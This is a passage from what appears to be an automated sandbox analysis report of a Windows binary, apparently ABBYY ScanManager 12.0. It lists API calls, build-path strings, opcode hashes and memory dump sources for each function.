                                                                                                • API ID: Window
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\framewindowawl.cpp
                                                                                                • API String ID: 2353593579-1930538455
                                                                                                • Opcode ID: 7b869d218405a0b6a303ab7ebf5bafe80bb498b5d7d6333720754ca5fdd75dfc
                                                                                                • Instruction ID: 92ce23b2523ca9aae05ccfb67c203bb5150bd61e63291ea23f8bc39617f414d2
                                                                                                • Opcode Fuzzy Hash: 7b869d218405a0b6a303ab7ebf5bafe80bb498b5d7d6333720754ca5fdd75dfc
                                                                                                • Instruction Fuzzy Hash: 8611E631E407189BDB20EF64C9427AEB7B4AF14B14F10825FE801A73C1E7B85A00CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0041E301
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: IncrementInterlocked
                                                                                                • String ID: ..\Shared\ServerShared.cpp$@fO
                                                                                                • API String ID: 3508698243-2155195384
                                                                                                • Opcode ID: 3f67786475f2982185cd3c7f43eed72734d87e69e7e3d35829f7e40aafa49f40
                                                                                                • Instruction ID: 927817c0af429cd4eb2f4fbf9fb70016d1d3884fa6b61de68bf3b118978fa863
                                                                                                • Opcode Fuzzy Hash: 3f67786475f2982185cd3c7f43eed72734d87e69e7e3d35829f7e40aafa49f40
                                                                                                • Instruction Fuzzy Hash: 4B110675600208DBC7189F199D06BBAB7B5FB44B04F10466FE806977D1E7BA18018789
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004CD826: EnterCriticalSection.KERNEL32(?,?,004CB64C,004BE1F9,0052BAE0,00000008,004CB71A,?,?,004BE1F9,?,004BE1F9,004844FC,?,00000000), ref: 004CD835
                                                                                                • _free.LIBCMT ref: 004C51F1
                                                                                                  • Part of subcall function 004CB2DE: HeapFree.KERNEL32(00000000,00000000,?,004D0047,?,00000000,?,00000000,?,004D02EB,?,00000007,?,?,004D082C,?), ref: 004CB2F4
                                                                                                  • Part of subcall function 004CB2DE: GetLastError.KERNEL32(?,?,004D0047,?,00000000,?,00000000,?,004D02EB,?,00000007,?,?,004D082C,?,?), ref: 004CB306
                                                                                                • _free.LIBCMT ref: 004C5246
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: _free$CriticalEnterErrorFreeHeapLastSection
                                                                                                • String ID: x0O
                                                                                                • API String ID: 3530288311-2626062856
                                                                                                • Opcode ID: ad61e6a24a51524969701ea40332276773901c4338f642c94c000ce706e0b0d8
                                                                                                • Instruction ID: e172025648da3e7d29e3c18a6db6345e544594ab714f57d5ea92759b42da7abf
                                                                                                • Opcode Fuzzy Hash: ad61e6a24a51524969701ea40332276773901c4338f642c94c000ce706e0b0d8
                                                                                                • Instruction Fuzzy Hash: A4018E39501B0096DBB46F65940AF5E77E0AF01724F24466FE464562D1CB3CA8C0CE5D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 0042F328
                                                                                                • @fO, xrefs: 0042F332
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 2353593579-3471680474
                                                                                                • Opcode ID: 6fb49a9d4baedfb705a76864c6b3f1a9d9ba449345a437989d05d4ca5f55304a
                                                                                                • Instruction ID: 673962c7c29417beb3fa9385b509842cc6e60573037cffee5fc092c56375870b
                                                                                                • Opcode Fuzzy Hash: 6fb49a9d4baedfb705a76864c6b3f1a9d9ba449345a437989d05d4ca5f55304a
                                                                                                • Instruction Fuzzy Hash: 0201F931B40B549BD724EB99AD12B2B73A8EB04B14F40027FFC16977C1DBB898008689
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(00000008), ref: 0049B3A3
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\object.h, xrefs: 0049B35E
                                                                                                • @fO, xrefs: 0049B368
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$DecrementEnterException@8InterlockedLeaveThrow
                                                                                                • String ID: @fO$d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\object.h
                                                                                                • API String ID: 132347594-3192388581
                                                                                                • Opcode ID: 23a89168a58aa0ea5e4d4d4351a2dee997205175f506ebd076fb01b94317048d
                                                                                                • Instruction ID: 47d3d07be96285dde5817280751e31db748f5d3951183c8eaba81950b77a6fae
                                                                                                • Opcode Fuzzy Hash: 23a89168a58aa0ea5e4d4d4351a2dee997205175f506ebd076fb01b94317048d
                                                                                                • Instruction Fuzzy Hash: E1117C316406149FDB30CF18CA05B6ABBE4EB04B14F10866EED5A977C1DB79A8008BC4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0041726C
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00417282
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: IncrementInterlocked
                                                                                                • String ID: HfO
                                                                                                • API String ID: 3508698243-1410110794
                                                                                                • Opcode ID: 8489b22b163e40d100b59a6a81c9898ff189d153813f6f11a8ba75e6d106d680
                                                                                                • Instruction ID: c0a475cdb3098aa3f4d2406331275a0b5c89197728d2826616219be201e92ecc
                                                                                                • Opcode Fuzzy Hash: 8489b22b163e40d100b59a6a81c9898ff189d153813f6f11a8ba75e6d106d680
                                                                                                • Instruction Fuzzy Hash: 662119B490064AEFC700CF98C688B59FBF4FB44714F10C65AE8249B791C7B9E914CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(00417A7B), ref: 0041A152
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrement
                                                                                                • String ID: ABBYY ScanManager 12.0$xMS
                                                                                                • API String ID: 2172605799-2016925491
                                                                                                • Opcode ID: 433e092b494471b0114ce6d251f3345a2a9b64ccba89dc43c1dd32b7d7fb829c
                                                                                                • Instruction ID: a1a06b979a67cd12d309fc7375ccc2cd616c0b70a77c2480a19e00ba6bf5c7f8
                                                                                                • Opcode Fuzzy Hash: 433e092b494471b0114ce6d251f3345a2a9b64ccba89dc43c1dd32b7d7fb829c
                                                                                                • Instruction Fuzzy Hash: 2701C471941604ABC710DF59CC81BEABB74FB09720F40862EF829573D1D7785940CA84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00473290: InterlockedDecrement.KERNEL32(00000000), ref: 00473314
                                                                                                  • Part of subcall function 00473290: InterlockedDecrement.KERNEL32(?), ref: 00473330
                                                                                                  • Part of subcall function 00473290: InterlockedIncrement.KERNEL32 ref: 0047335E
                                                                                                  • Part of subcall function 00473290: RegCloseKey.ADVAPI32(00000000,00000000,?,004F6640,80000001,0000010B,00000000,00000000), ref: 004733B0
                                                                                                  • Part of subcall function 00473290: SetLastError.KERNEL32(00000000), ref: 004733B7
                                                                                                  • Part of subcall function 00473290: InterlockedDecrement.KERNEL32(00530380), ref: 004733C1
                                                                                                  • Part of subcall function 00473290: InterlockedDecrement.KERNEL32(000000FF), ref: 004733DA
                                                                                                  • Part of subcall function 00469800: InterlockedIncrement.KERNEL32(00000000), ref: 00469822
                                                                                                  • Part of subcall function 00469800: InterlockedDecrement.KERNEL32(00000000), ref: 004698D7
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00473257
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment$CloseErrorLast
                                                                                                • String ID: BreakOnMemoryException$xMS
                                                                                                • API String ID: 3009240362-3216249449
                                                                                                • Opcode ID: 189e8cb4af6fb908912b808f476ec6917690c03c079ad724f70db1a790920f87
                                                                                                • Instruction ID: 16b63b4c2b678f865c14fc88a36e5e2e62e81d27830c069b41d8fe7891f135a3
                                                                                                • Opcode Fuzzy Hash: 189e8cb4af6fb908912b808f476ec6917690c03c079ad724f70db1a790920f87
                                                                                                • Instruction Fuzzy Hash: 6401F271940618AFCB10EF58CC42BEEB7B8EB01721F10426EF825A37C1D7396E04CAA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00473290: InterlockedDecrement.KERNEL32(00000000), ref: 00473314
                                                                                                  • Part of subcall function 00473290: InterlockedDecrement.KERNEL32(?), ref: 00473330
                                                                                                  • Part of subcall function 00473290: InterlockedIncrement.KERNEL32 ref: 0047335E
                                                                                                  • Part of subcall function 00473290: RegCloseKey.ADVAPI32(00000000,00000000,?,004F6640,80000001,0000010B,00000000,00000000), ref: 004733B0
                                                                                                  • Part of subcall function 00473290: SetLastError.KERNEL32(00000000), ref: 004733B7
                                                                                                  • Part of subcall function 00473290: InterlockedDecrement.KERNEL32(00530380), ref: 004733C1
                                                                                                  • Part of subcall function 00473290: InterlockedDecrement.KERNEL32(000000FF), ref: 004733DA
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0046D05A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$CloseErrorIncrementLast
                                                                                                • String ID: AssertStopMode$xMS
                                                                                                • API String ID: 3260267881-3912653345
                                                                                                • Opcode ID: b8d004a7561a0a7cb15df754a3c81753b42140eab5b10f8f186da9e69b08f1bd
                                                                                                • Instruction ID: fbcfd81d87ac4d730785bf55d08700272b2c64f04c522aae75293b903cb550da
                                                                                                • Opcode Fuzzy Hash: b8d004a7561a0a7cb15df754a3c81753b42140eab5b10f8f186da9e69b08f1bd
                                                                                                • Instruction Fuzzy Hash: AF01D471E00609ABCB10EF95CD01BAFB7B8FB41724F10462AE81573381D7781901C7D2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • @fO, xrefs: 0044E180
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\unicodecomboboxawl.cpp, xrefs: 0044E176
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\unicodecomboboxawl.cpp
                                                                                                • API String ID: 2353593579-3778035943
                                                                                                • Opcode ID: 34a4df9684793877802d715b3b2e81110e866a384547ca74c675ef4d9222a148
                                                                                                • Instruction ID: 15fb316274e0412814cbd201b490876e03f7b9255dbd758d5190c563e39ab47a
                                                                                                • Opcode Fuzzy Hash: 34a4df9684793877802d715b3b2e81110e866a384547ca74c675ef4d9222a148
                                                                                                • Instruction Fuzzy Hash: A101A271740308FBEB109F55CD06B6BB764FB44B10F00462BBC15AB7C1E7BA9910CA84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32 ref: 00480418
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\src\commandlinefo.cpp, xrefs: 004803F3
                                                                                                • @fO, xrefs: 004803FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: IncrementInterlocked
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\commandlinefo.cpp
                                                                                                • API String ID: 3508698243-798494017
                                                                                                • Opcode ID: 1f5f5071fb78ff6531e627d0ed7f110bd9326cb5195a7c33746702d121560adf
                                                                                                • Instruction ID: 0e19a5e1688f35ba80525ae0da07ee08bd338673f21acab7672c79c30a43b6a5
                                                                                                • Opcode Fuzzy Hash: 1f5f5071fb78ff6531e627d0ed7f110bd9326cb5195a7c33746702d121560adf
                                                                                                • Instruction Fuzzy Hash: 6C01A276A40264EBD7209F48D801B6EB7A4FB04B20F11462FFD10A7781C7B9A80087D4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                  • Part of subcall function 004743C0: EnterCriticalSection.KERNEL32(00534CF0), ref: 0047443E
                                                                                                  • Part of subcall function 004743C0: InterlockedIncrement.KERNEL32(?), ref: 004744E3
                                                                                                  • Part of subcall function 004743C0: InterlockedDecrement.KERNEL32(005305AC), ref: 004744EC
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004012B1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrement$CriticalEnterSection
                                                                                                • String ID: ScanMan.ScannedImage$xMS
                                                                                                • API String ID: 880407097-1708699078
                                                                                                • Opcode ID: c23d164e088ad73c2561a7d37fed15b43c23b150959e444a21a545887b72911a
                                                                                                • Instruction ID: a24ecf89e6986744ea3dd09dc94723af64cbce88069e6a46865618ca41ab050c
                                                                                                • Opcode Fuzzy Hash: c23d164e088ad73c2561a7d37fed15b43c23b150959e444a21a545887b72911a
                                                                                                • Instruction Fuzzy Hash: D701A2B1540654ABCB10EF85CC02BAE77A8FB01B24F10466EF515632C1DB396910C79A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                  • Part of subcall function 004743C0: EnterCriticalSection.KERNEL32(00534CF0), ref: 0047443E
                                                                                                  • Part of subcall function 004743C0: InterlockedIncrement.KERNEL32(?), ref: 004744E3
                                                                                                  • Part of subcall function 004743C0: InterlockedDecrement.KERNEL32(005305AC), ref: 004744EC
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401341
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrement$CriticalEnterSection
                                                                                                • String ID: ScanMan.ScanStatus$xMS
                                                                                                • API String ID: 880407097-466333430
                                                                                                • Opcode ID: 95c9df4cda266c16d3b92892cd22e1f286093e87c300d68f8bdd0c2f5dc91eed
                                                                                                • Instruction ID: c6d37eec9303b730a01bdb8284edd864eb31d24f50c445ec1d4dcfaedee617d5
                                                                                                • Opcode Fuzzy Hash: 95c9df4cda266c16d3b92892cd22e1f286093e87c300d68f8bdd0c2f5dc91eed
                                                                                                • Instruction Fuzzy Hash: F001D1B1A40A48EBDB10EF85CC02BAF7768FB01B24F00462EF525637C1DB396D14879A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                  • Part of subcall function 004743C0: EnterCriticalSection.KERNEL32(00534CF0), ref: 0047443E
                                                                                                  • Part of subcall function 004743C0: InterlockedIncrement.KERNEL32(?), ref: 004744E3
                                                                                                  • Part of subcall function 004743C0: InterlockedDecrement.KERNEL32(005305AC), ref: 004744EC
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004013D1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrement$CriticalEnterSection
                                                                                                • String ID: ScanMan.SourceCapabilities$xMS
                                                                                                • API String ID: 880407097-2689104139
                                                                                                • Opcode ID: 829b8f36a58a9bdb2899593afff5626cfc37d12bc03d407a1341c9343085e26e
                                                                                                • Instruction ID: 8d4f70f292862e6449528807e1a72f2f5b1e1615f33fa6e82c8f0b2401152b27
                                                                                                • Opcode Fuzzy Hash: 829b8f36a58a9bdb2899593afff5626cfc37d12bc03d407a1341c9343085e26e
                                                                                                • Instruction Fuzzy Hash: B401D1B1A40A54ABD710EF86CC02BAF7768FB41B24F00462EF425A77C1DB796D14C79A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                  • Part of subcall function 004743C0: EnterCriticalSection.KERNEL32(00534CF0), ref: 0047443E
                                                                                                  • Part of subcall function 004743C0: InterlockedIncrement.KERNEL32(?), ref: 004744E3
                                                                                                  • Part of subcall function 004743C0: InterlockedDecrement.KERNEL32(005305AC), ref: 004744EC
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401461
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrement$CriticalEnterSection
                                                                                                • String ID: ScanMan.SourceInfo$xMS
                                                                                                • API String ID: 880407097-816116573
                                                                                                • Opcode ID: 6027b80bb9d771dc4a4bb670f4de6dddd8269efa6764cef4ce2f1f5504657707
                                                                                                • Instruction ID: fa018ce8b66a86fefc80c78a9ebe22c041df172a5616fed2ba9475f55f79383a
                                                                                                • Opcode Fuzzy Hash: 6027b80bb9d771dc4a4bb670f4de6dddd8269efa6764cef4ce2f1f5504657707
                                                                                                • Instruction Fuzzy Hash: E501D1B1940648ABC711EF95DC02BAF7768FB41B24F00462EF425633D1DB796D20879A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetMenuItemInfoW.USER32(?,?,00000001,00000030), ref: 0043842A
                                                                                                • SetMenuItemInfoW.USER32 ref: 0043845F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: InfoItemMenu
                                                                                                • String ID: 0
                                                                                                • API String ID: 1619232296-4108050209
                                                                                                • Opcode ID: 4185dde25453a821b782e2131a041c7e5c034da8b2c784001751325820cbcc92
                                                                                                • Instruction ID: c72df885240d3680436bb53b617a45d22a923a6072dac67acabebc1671f2edf8
                                                                                                • Opcode Fuzzy Hash: 4185dde25453a821b782e2131a041c7e5c034da8b2c784001751325820cbcc92
                                                                                                • Instruction Fuzzy Hash: 26018B71414305BFD710CF14DC0ABAABBA8EB44328F008A2EF9A4910E0E7B49658CF96
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: $
                                                                                                • API String ID: 3850602802-227171996
                                                                                                • Opcode ID: 6710cd2df147bf692783679257a1521da0be78e2555684d3bb2769ee5f2f585f
                                                                                                • Instruction ID: 17a76bd0b189a45c319c8bf01ff21c09bc37da6f02544147b044ac597e043117
                                                                                                • Opcode Fuzzy Hash: 6710cd2df147bf692783679257a1521da0be78e2555684d3bb2769ee5f2f585f
                                                                                                • Instruction Fuzzy Hash: 0DE09B70508744A7F7059F28DC066A5BBE8AF55324F004318FD98C21D0F732965586D6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00000000,0047B074), ref: 004CD2B1
                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,0047B074,00000000,00000000,?,0047B074,FFFFFFFF), ref: 004CD2BF
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,00000000,?,?,0047B074,00000000,00000000,?,0047B074,FFFFFFFF), ref: 004CD31A
                                                                                                Memory Dump Source
